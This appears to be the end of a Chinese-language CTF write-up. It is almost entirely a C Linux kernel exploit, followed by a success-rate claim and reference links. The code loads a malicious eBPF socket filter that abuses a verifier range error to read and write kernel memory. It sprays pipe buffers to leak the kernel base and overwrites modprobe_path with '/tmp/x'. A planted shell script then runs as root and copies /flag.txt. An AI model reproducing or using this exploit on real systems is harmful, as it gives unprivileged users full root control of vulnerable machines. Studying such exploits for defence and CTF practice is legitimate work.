uint64_t* value1;
uint64_t* value2;
char trigger_buf[0x2000];
int64_t buf[0x2000/8] = { 0 };

#define BPF_VICTIM_READ_BY_ADDRESS 0xbeef
#define BPF_VICTIM_WRITE_BY_ADDRESS 0xdeaf
#define BPF_VICTIM_READ_BY_2BYTES 0xdead

#define MAX_PIPE_COUNT 0x20
int pipe_fd[MAX_PIPE_COUNT][2];

void spray_pipes(int start, int cnt) {
    char *buf[0x1000] = { 0 };
    printf("[*] enter %s start from index: %d\n", __PRETTY_FUNCTION__, start);

    for (int i = start; i < cnt; ++i) {
        if (pipe(pipe_fd[i]) < 0) {
            perror("create pipe");
            exit(0);
        }
    }
}

void pipes_resize(){
    puts("[*] pipe buffer resize");
    for(int i = 0; i < MAX_PIPE_COUNT; i++){
        if (fcntl(pipe_fd[i][1], F_SETPIPE_SZ, 0x1000 * 128) < 0) {
            perror("resize pipe");
            exit(0);
        }
    }
}

void pipe_buffer_init(){
    puts("[*] pipe buffer init");
    for (int i = 0; i < MAX_PIPE_COUNT; ++i) {
        uint32_t k = i;
        write(pipe_fd[i][1], "writesth", 8);
        write(pipe_fd[i][1], "Qanux", 8);
        write(pipe_fd[i][1], &k, sizeof(uint32_t));
    }
}

void err_exit(char *msg){
    printf("\033[31m\033[1m[x] Error at: \033[0m%s\n", msg);
    sleep(5);
    exit(EXIT_FAILURE);
}
 
void info(char *msg){
    printf("\033[34m\033[1m[+] %s\n\033[0m", msg);
}
 
void hexx(char *msg, size_t value){
    printf("\033[32m\033[1m[+] %s: %#lx\n\033[0m", msg, value);
}
 
void binary_dump(char *desc, void *addr, int len) {
    uint64_t *buf64 = (uint64_t *) addr;
    uint8_t *buf8 = (uint8_t *) addr;
    if (desc != NULL) {
        printf("\033[33m[*] %s:\n\033[0m", desc);
    }
    for (int i = 0; i < len / 8; i += 4) {
        printf("  %04x", i * 8);
        for (int j = 0; j < 4; j++) {
            i + j < len / 8 ? printf(" 0x%016lx", buf64[i + j]) : printf("                   ");
        }
        printf("   ");
        for (int j = 0; j < 32 && j + i * 8 < len; j++) {
            printf("%c", isprint(buf8[i * 8 + j]) ? buf8[i * 8 + j] : '.');
        }
        puts("");
    }
}

/* bind the process to specific core */
void bind_core(int core){
    cpu_set_t cpu_set;

    CPU_ZERO(&cpu_set);
    CPU_SET(core, &cpu_set);
    sched_setaffinity(getpid(), sizeof(cpu_set), &cpu_set);

    printf("\033[34m\033[1m[*] Process binded to core \033[0m%d\n", core);
}

size_t user_cs, user_ss, user_rflags, user_sp;
void save_status(){
    asm volatile (
        "mov user_cs, cs;"
        "mov user_ss, ss;"
        "mov user_sp, rsp;"
        "pushf;"
        "pop user_rflags;"
    );
    puts("\033[34m\033[1m[*] Status has been saved.\033[0m");
}

int trigger_modprobe(){
    struct sockaddr_alg sa;

    int alg_fd = socket(AF_ALG, SOCK_SEQPACKET, 0);
    if (alg_fd < 0) {
            perror("socket(AF_ALG) failed");
            return 1;
    }

    memset(&sa, 0, sizeof(sa));
    sa.salg_family = AF_ALG;
    strcpy((char *)sa.salg_type, "Qanux");  // dummy string
    bind(alg_fd, (struct sockaddr *)&sa, sizeof(sa));
    return 1;
}

void get_root_flag(void){
    char buf[0x30];
    memset(buf, 0, sizeof(buf));
    puts("[*] Returned to userland, setting up for fake modprobe");

    system("echo '#!/bin/sh\ncp /flag.txt /tmp/flag\nchmod 777 /tmp/flag\ncat /flag.txt' > /tmp/x");
    system("chmod +x /tmp/x");

    trigger_modprobe(0);

    int fd = open("/tmp/flag", O_RDONLY);
    if (fd < 0) {
        puts("[-] Lose...");
    } else {
        read(fd, buf, 0x30);
        printf("[+] flag: %s", buf);
    }
}

static inline int bpf(int cmd, union bpf_attr *attr){
    return syscall(__NR_bpf, cmd, attr, sizeof(*attr));
}

static __always_inline int
bpf_map_create(unsigned int map_type, unsigned int key_size,
               unsigned int value_size, unsigned int max_entries){
    union bpf_attr attr = {
        .map_type = map_type,
        .key_size = key_size,
        .value_size = value_size,
        .max_entries = max_entries,
    };
    return bpf(BPF_MAP_CREATE, &attr);
}

int create_bpf_array_of_map(int fd, int key_size, int value_size, int max_entries) {
    union bpf_attr attr = {
        .map_type = BPF_MAP_TYPE_ARRAY_OF_MAPS,
        .key_size = key_size,
        .value_size = value_size,
        .max_entries = max_entries,
        .inner_map_fd = fd,
    };

    int map_fd = syscall(SYS_bpf, BPF_MAP_CREATE, &attr, sizeof(attr));
    if (map_fd < 0) {
        return -1;
    }
    return map_fd;
}

static __always_inline int
bpf_map_lookup_elem(int map_fd, const void* key, void* value){
    union bpf_attr attr = {
        .map_fd = map_fd,
        .key = (uint64_t)key,
        .value = (uint64_t)value,
    };
    return bpf(BPF_MAP_LOOKUP_ELEM, &attr);
}

static __always_inline int
bpf_map_update_elem(int map_fd, const void* key, const void* value, uint64_t flags){
    union bpf_attr attr = {
        .map_fd = map_fd,
        .key = (uint64_t)key,
        .value = (uint64_t)value,
        .flags = flags,
    };
    return bpf(BPF_MAP_UPDATE_ELEM, &attr);
}

static __always_inline int
bpf_map_delete_elem(int map_fd, const void* key){
    union bpf_attr attr = {
        .map_fd = map_fd,
        .key = (uint64_t)key,
    };
    return bpf(BPF_MAP_DELETE_ELEM, &attr);
}

static __always_inline int
bpf_map_get_next_key(int map_fd, const void* key, void* next_key){
    union bpf_attr attr = {
        .map_fd = map_fd,
        .key = (uint64_t)key,
        .next_key = (uint64_t)next_key,
    };
    return bpf(BPF_MAP_GET_NEXT_KEY, &attr);
}

static __always_inline uint32_t
bpf_map_get_info_by_fd(int map_fd){
    struct bpf_map_info info;
    union bpf_attr attr = {
        .info.bpf_fd = map_fd,
        .info.info_len = sizeof(info),
        .info.info = (uint64_t)&info,
    };
    bpf(BPF_OBJ_GET_INFO_BY_FD, &attr);
    return info.btf_id;
}

#define LOG_BUF_SIZE 65536
char bpf_log_buf[LOG_BUF_SIZE];
int bpf_prog_load6(enum bpf_prog_type type,
				  const struct bpf_insn *insns, int insn_cnt,
				  const char *license)
{
	union bpf_attr attr = {
		.prog_type = type,
		.insns = (size_t)(insns),
		.insn_cnt = insn_cnt,
		.license = (size_t)(license),
		.log_buf = (size_t)(bpf_log_buf),
		.log_size = LOG_BUF_SIZE,
		.log_level = 1,
	};

	return syscall(SYS_bpf, BPF_PROG_LOAD, &attr, sizeof(attr));
}
struct bpf_insn prog[] = {
    BPF_MOV64_REG(BPF_REG_7, BPF_REG_1),                            // r7 = ctx
    BPF_LD_MAP_FD(BPF_REG_1, 83),                                   // r1 = [map_fd1]
    BPF_MOV64_IMM(BPF_REG_6, 0),                                    // r6 = 0
    BPF_STX_MEM(BPF_DW, BPF_REG_10, BPF_REG_6, -8),                 // *(fp -8) = 0
    BPF_MOV64_REG(BPF_REG_2, BPF_REG_10),                           // r2 = fp
    BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -8),                          // r2 = fp - 8
    BPF_RAW_INSN(BPF_JMP|BPF_CALL, 0, 0, 0, BPF_FUNC_map_lookup_elem), // args: r1 = bpf_map1 ptr, r2 = fp - 8
    BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),                          // if r0 <= r0 goto pc+1 right
    BPF_EXIT_INSN(),                                                // exit
    BPF_MOV64_REG(BPF_REG_9, BPF_REG_0),                            // r9 = value1 ptr

    BPF_LD_MAP_FD(BPF_REG_1, 84),                                   // r1 = [map_fd2]
    BPF_MOV64_IMM(BPF_REG_5, 0),                                    // r5 = 0
    BPF_STX_MEM(BPF_DW, BPF_REG_10, BPF_REG_5, -8),                 // *(fp -8) = 0
    BPF_MOV64_REG(BPF_REG_2, BPF_REG_10),                           // r2 = fp
    BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -8),                          // r2 = fp - 8
    BPF_RAW_INSN(BPF_JMP|BPF_CALL, 0, 0, 0, BPF_FUNC_map_lookup_elem), // args: r1 = bpf_map2 ptr, r2 = fp - 8
    BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),                          // if r0 <= r0 goto pc+1 right
    BPF_EXIT_INSN(),                                                // exit
    BPF_MOV64_REG(BPF_REG_8, BPF_REG_0),                            // r8 = value2 ptr

    BPF_STX_MEM(BPF_DW, BPF_REG_10, BPF_REG_9, -8),                 // *(fp -8) = value1 ptr

    BPF_MOV32_IMM(BPF_REG_6, 0x2),                                  // R6 = 0x2
    BPF_ALU32_IMM(224, BPF_REG_6, 31),                              // R6 << 31
    BPF_ALU64_IMM(BPF_AND, BPF_REG_6, 0x1),                         // R6 = 0x1 [verifier 0]

    BPF_LDX_MEM(BPF_DW, BPF_REG_5, BPF_REG_8, 0),                   // r5 = value2[0] = len
    BPF_JMP_IMM(BPF_JNE, BPF_REG_5, 0xdead, 2),                     // leak map_addr
    BPF_ALU64_IMM(BPF_MUL, BPF_REG_6, 2),                           // r6 = 2 [verifier 0]
    BPF_JMP_IMM(BPF_JEQ, BPF_REG_5, 0xdead, 1),                     // jmp
    BPF_ALU64_IMM(BPF_MUL, BPF_REG_6, 8),                           // r6 = 8 

    BPF_MOV64_REG(BPF_REG_1, BPF_REG_7),                            // r1 = ctx
    BPF_MOV64_IMM(BPF_REG_2, 0),                                    // r2 = 0
    BPF_MOV64_REG(BPF_REG_3, BPF_REG_10),                           // r3 = fp
    BPF_ALU64_IMM(BPF_ADD, BPF_REG_3, -16),                         // r3 = fp -8
    BPF_MOV64_IMM(BPF_REG_4, 8),                                    // r4 = 8
    BPF_ALU64_REG(BPF_ADD, BPF_REG_4, BPF_REG_6),                   // r4 = 10 [verifier 8]
    BPF_RAW_INSN(BPF_JMP|BPF_CALL, 0, 0, 0, BPF_FUNC_skb_load_bytes), // args: r1 = ctx, r2 = 0, r3 = fp -8, r4 = 10 [verifier 8]

    BPF_LDX_MEM(BPF_DW, BPF_REG_9, BPF_REG_10, -8),                 // r9 = value1 ptr

    BPF_LDX_MEM(BPF_DW, BPF_REG_4, BPF_REG_8, 0),                   // r5 = value2[0] = len
    BPF_JMP_IMM(BPF_JEQ, BPF_REG_4, 0xdead, 4),                     // jmp
    BPF_JMP_IMM(BPF_JEQ, BPF_REG_4, 0xbeef, 3),                     // jmp
    BPF_LDX_MEM(BPF_DW, BPF_REG_5, BPF_REG_8, 8),                   // r5 = value2[1]
    BPF_STX_MEM(BPF_DW, BPF_REG_9, BPF_REG_5, 0),                   // value1[0] = value2[0]
    BPF_JMP_IMM(BPF_JEQ, BPF_REG_4, 0xdeef, 2),
    BPF_LDX_MEM(BPF_DW, BPF_REG_5, BPF_REG_9, 0),                   // r5 = value1[0]
    BPF_STX_MEM(BPF_DW, BPF_REG_8, BPF_REG_5, 0),                   // value2[0] = value1[0]

    BPF_MOV64_IMM(BPF_REG_0, 0),                                    // r0 = 0
    BPF_EXIT_INSN(),                                                // exit()
};

union bpf_attr attr = {
    .prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
    .insns = (uint64_t) &prog,
    .insn_cnt = sizeof(prog) / sizeof(prog[0]),
    .license = (uint64_t) "GPL",
    .log_level = 2,
    .log_buf = (uint64_t) bpf_log_buf,
    .log_size = LOG_BUF_SIZE,
};

void init() {
    setbuf(stdin, NULL);
    setbuf(stdout, NULL);
    setbuf(stderr, NULL);

    bind_core(0);
    save_status();

    FILE *file;
    const char *filename = "/tmp/elf";

    file = fopen(filename, "w");
    if (file == NULL) {
        perror("Error opening file");
        return 1;
    }
    fclose(file);
}

void trigger() {
    write(sockets[0], trigger_buf, 0x100);
}

#define VALUE_SIZE 0x1000
int spray_bpf_fd[0x10];
void spray_bpf_map(){
    puts("[*] spray bpf map.");
    uint64_t *value = (uint64_t*)calloc(VALUE_SIZE, 1);
    for(int i = 0; i < 0x10; i++){
        spray_bpf_fd[i] = bpf_map_create(BPF_MAP_TYPE_ARRAY, sizeof(int), VALUE_SIZE, 1);
        if (spray_bpf_fd[i] < 0) perror("BPF_MAP_CREATE"), err_exit("BPF_MAP_CREATE");
    }

    free(value);
}

void prep() {
    puts("[*] prepare bpf map");
    value1 = (uint64_t*)calloc(VALUE_SIZE, 1);
    value2 = (uint64_t*)calloc(VALUE_SIZE, 1);
    prctl(PR_SET_NAME, "Qanux");

    map_fd1 = bpf_map_create(BPF_MAP_TYPE_ARRAY, sizeof(int), VALUE_SIZE, 1);
    if (map_fd1 < 0) perror("BPF_MAP_CREATE"), err_exit("BPF_MAP_CREATE");
    printf("[+] map fd1: %d \n", map_fd1);  // 83

    map_fd2 = bpf_map_create(BPF_MAP_TYPE_ARRAY, sizeof(int), VALUE_SIZE, 1);
    if (map_fd2 < 0) perror("BPF_MAP_CREATE"), err_exit("BPF_MAP_CREATE");
    printf("[+] map fd2: %d \n", map_fd2);  // 84

    prog_fd = bpf(BPF_PROG_LOAD, &attr);
    if (prog_fd < 0) puts(bpf_log_buf), perror("BPF_PROG_LOAD"), err_exit("BPF_PROG_LOAD");

    if (socketpair(AF_UNIX, SOCK_DGRAM, 0, sockets) < 0)
        perror("socketpair()"), err_exit("socketpair()");

    if (setsockopt(sockets[1], SOL_SOCKET, SO_ATTACH_BPF, &prog_fd, sizeof(prog_fd)) < 0)
        perror("socketpair SO_ATTACH_BPF"), err_exit("socketpair()");
}

size_t leak_data(size_t address){
    value2[0] = BPF_VICTIM_READ_BY_ADDRESS;
    value2[1] = 0;
    bpf_map_update_elem(map_fd2, &key, value2, BPF_ANY);
    *(uint64_t *)(trigger_buf + 8) = address - 0x18;
    trigger();
    memset(buf, 0, sizeof(buf));
    bpf_map_lookup_elem(map_fd2, &key, buf);
    return *(uint64_t*)buf;
}

size_t leak_data_by_2bytes(int bytes){
    value2[0] = BPF_VICTIM_READ_BY_2BYTES;
    bpf_map_update_elem(map_fd2, &key, value2, BPF_ANY);
    trigger_buf[8+1] = bytes;
    trigger();
    memset(buf, 0, sizeof(buf));
    bpf_map_lookup_elem(map_fd2, &key, buf);
    return *(uint64_t*)buf;
}

void data_wirte(size_t address, size_t data){
    value2[0] = BPF_VICTIM_WRITE_BY_ADDRESS;
    value2[1] = data;  
    bpf_map_update_elem(map_fd2, &key, value2, BPF_ANY);
    *(uint64_t *)(trigger_buf + 8) = address;
    trigger();
}

int main(int argc, char** argv, char** env)
{   
    init();
    spray_pipes(0, MAX_PIPE_COUNT);
    spray_bpf_map();
    prep();
    pipes_resize();

    pipe_buffer_init();

    memset(trigger_buf, 'A', sizeof(trigger_buf));
    value2[0] = BPF_VICTIM_READ_BY_2BYTES;
    bpf_map_update_elem(map_fd1, &key, value1, BPF_ANY);
    bpf_map_update_elem(map_fd2, &key, value2, BPF_ANY);

    size_t pipe_ops = -1;
    int victim_index = 0;
    puts("[*] leak kernel addrss");
    for (int i = 0; i < 0x8; i++) {
        int is_map = 1;
        trigger_buf[8] = '\x10';
        bpf_map_lookup_elem(map_fd2, &key, buf);
        uint64_t data = leak_data_by_2bytes(i*0x20);
        if ((data & 0xffffffff00000000) == (0xffffffff00000000)){
            is_map = 0;
            if(pipe_ops == -1){
                pipe_ops = data;
                victim_index = i*0x10;
            }
        }

        if(is_map){
            printf("[+] page %d (bpf_array):\n", i);
        } else if((data & 0xffffffff00000000) == (0xffffffff00000000)){
            printf("[+] page %d (pipe_buffer):\n", i);
        }

        trigger_buf[8] = '\x00';
        printf("0x00: %-016llx ; ", leak_data_by_2bytes(i*0x20));
        trigger_buf[8] = '\x08';
        printf("0x08: %-016llx ; ", leak_data_by_2bytes(i*0x20));
        trigger_buf[8] = '\x10';
        printf("0x10: %-016llx ; ", leak_data_by_2bytes(i*0x20));
        trigger_buf[8] = '\x18';
        printf("0x18: %-016llx\n", leak_data_by_2bytes(i*0x20));
    }
    if (pipe_ops == -1)
            err_exit("FAILED to leak kernel address");

    hexx("pipe buffer ops", pipe_ops);
    printf("[+] pipe buffer ops idx: %d \n", victim_index);

    size_t kernel_base = pipe_ops - 0x142c580;
    hexx("kernel base", kernel_base);
    size_t modprobe = pipe_ops + 0xf1c820;
    hexx("modprobe", modprobe);

    data_wirte(modprobe, 0x782f706d742f);
    puts("[*] write /tmp/x to modprobe");

    get_root_flag();

    puts("[+] EXP END.");

    return 0;
}

效果如下：

成功率接近百分百（至少笔者还没失败过）

参考

https://arttnba3.cn/2023/05/31/EBPF_0X00/
https://blog.csdn.net/qq_61670993/article/details/136558244
https://theori.io/blog/reviving-the-modprobe-path-technique-overcoming-search-binary-handler-patch